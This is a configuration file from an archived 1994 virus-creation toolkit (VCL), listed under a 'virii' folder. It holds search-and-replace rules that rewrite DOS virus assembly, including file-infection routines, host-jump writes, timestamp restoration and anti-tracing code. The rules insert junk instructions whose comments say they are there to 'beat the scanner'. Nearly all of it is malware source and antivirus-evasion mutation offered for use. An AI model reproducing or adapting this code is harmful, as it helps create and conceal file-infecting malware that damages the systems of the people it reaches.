Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / virgen / vcl-asm / PATTERNS.CFG < prev next >

Wrap

Text File | 1994-04-25 | 11.9 KB | 315 lines

-SearchFor: infection_done: cmp byte ptr [set_carry],1 ret -ChangeTo: infection_done: push ax mov ah,1 cmp byte ptr [set_carry],ah ; Set carry flag if failed pop ax ret -EndChange -SearchFor: transfer_loop: lodsb or al,al je transfer_end inc ah stosb -ChangeTo: transfer_loop: lodsb ; Load a character or al,al ; Is it a NULL? je transfer_end ; If so then leave the loop add ah,1 ; Add one to the character count stosb -EndChange -SearchFor: lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus -ChangeTo: lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for xchg ax,bx ; beat the scanner xchg bx,ax ; with crap code push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus -EndChange -SearchFor: inc si ; Do the next word inc si ; loop xor_loop ; Loop until we're through ret ; Return to caller -ChangeTo: add si,2 ; Do the next word loop xor_loop ; Loop until we're through ret ; Return to caller -EndChange -SearchFor: inc di ; Do the next word inc di ; loop xor_loop ; Loop until we're through ret ; Return to caller -ChangeTo: add di,2 ; Do the next word loop xor_loop ; Loop until we're through ret ; Return to caller -EndChange -SearchFor: sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer -ChangeTo: sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,01h ; Crap code, crap code... mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer -EndChange -SearchFor: start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP sub bp,offset find_offset ; Adjust for length of host -ChangeTo: start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP xchg ax,bx ; beat the scanner xchg bx,ax ; with crap code sub bp,offset find_offset ; Adjust for length of host -EndChange -SearchFor: mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h -ChangeTo: mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack xchg ax,bx ; crap! xchg ax,bx ; crap! int 021h -EndChange -SearchFor: stop_tracing: mov cx,09EBh mov ax,0FE05h ; Acutal move, plus a HaLT jmp $-2 add ah,03Bh ; AH now equals 025h -ChangeTo: stop_tracing: mov cx,09EBh mov bx,09EBh mov ax,0FE05h ; Acutal move, plus a HaLT jmp $-2 add ah,03Bh ; AH now equals 025h -EndChange -SearchFor: vcl_marker db "[VCL]",0 ; VCL creation marker -ChangeTo: vcl_marker db "[VCL_MUT]",0 ; VCL creation marker -EndChange -SearchFor: sub bp,offset find_offset ; Adjust for length of host lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus -ChangeTo: sub bp,offset find_offset ; Adjust for length of host lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; crap code pop di ; crap code push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus -EndChange -SearchFor: mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end -ChangeTo: mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h xor ah,ah ; crap! crap! mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end -EndChange -SearchFor: mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h -ChangeTo: mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h xor ah,ah ; crap! crap! mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h -EndChange -SearchFor: pop si ; Restore SI mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h -ChangeTo: pop si ; Restore SI xor ah,ah ; crap crap! mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h -EndChange -SearchFor: mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory -ChangeTo: mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory xor ah,ah ; Crap Crap Crap! mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory -EndChange -SearchFor: push cs ; Transfer CS into ES for pop es ; byte transfer move_subdir: lodsb ; Load the next byte into AL cmp al,';' ; Have we reached a separator? je moved_one ; If so we're done copying or al,al ; Are we finished with the PATH? je moved_last_one ; If so get out of here stosb ; Store the byte at ES:DI jmp short move_subdir ; Keep transfering characters moved_last_one: xor si,si ; Zero SI to signal completion -ChangeTo: push cs ; Transfer CS into ES for pop es ; byte transfer move_subdir: lodsb ; Load the next byte into AL cmp al,';' ; Have we reached a separator? je moved_one ; If so we're done copying or al,al ; Are we finished with the PATH? je moved_last_one ; If so get out of here stosb ; Store the byte at ES:DI jmp short move_subdir ; Keep transfering characters moved_last_one: mov si,0000h ; Zero SI to signal completion -EndChange -SearchFor: lodsb ; Load the "P" into AL mov cx,08000h ; Check the first 32767 bytes repne scasb ; Search until the byte is found mov cx,4 ; Check the next four bytes -ChangeTo: lodsb ; Load the "P" into AL xor cl, cl ; crap crap crap mov cx,08000h ; Check the first 32767 bytes repne scasb ; Search until the byte is found mov cx,4 ; Check the next four bytes -EndChange -SearchFor: rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again mov ah,040h ; DOS write to file function -ChangeTo: rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again xor ah,ah mov ah,040h ; DOS write to file function -EndChange -SearchFor: done_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller up_dir db "..",0 ; Parent directory name -ChangeTo: done_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function push dx ; crap! pop dx ; crap! pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller up_dir db "..",0 ; Parent directory name -EndChange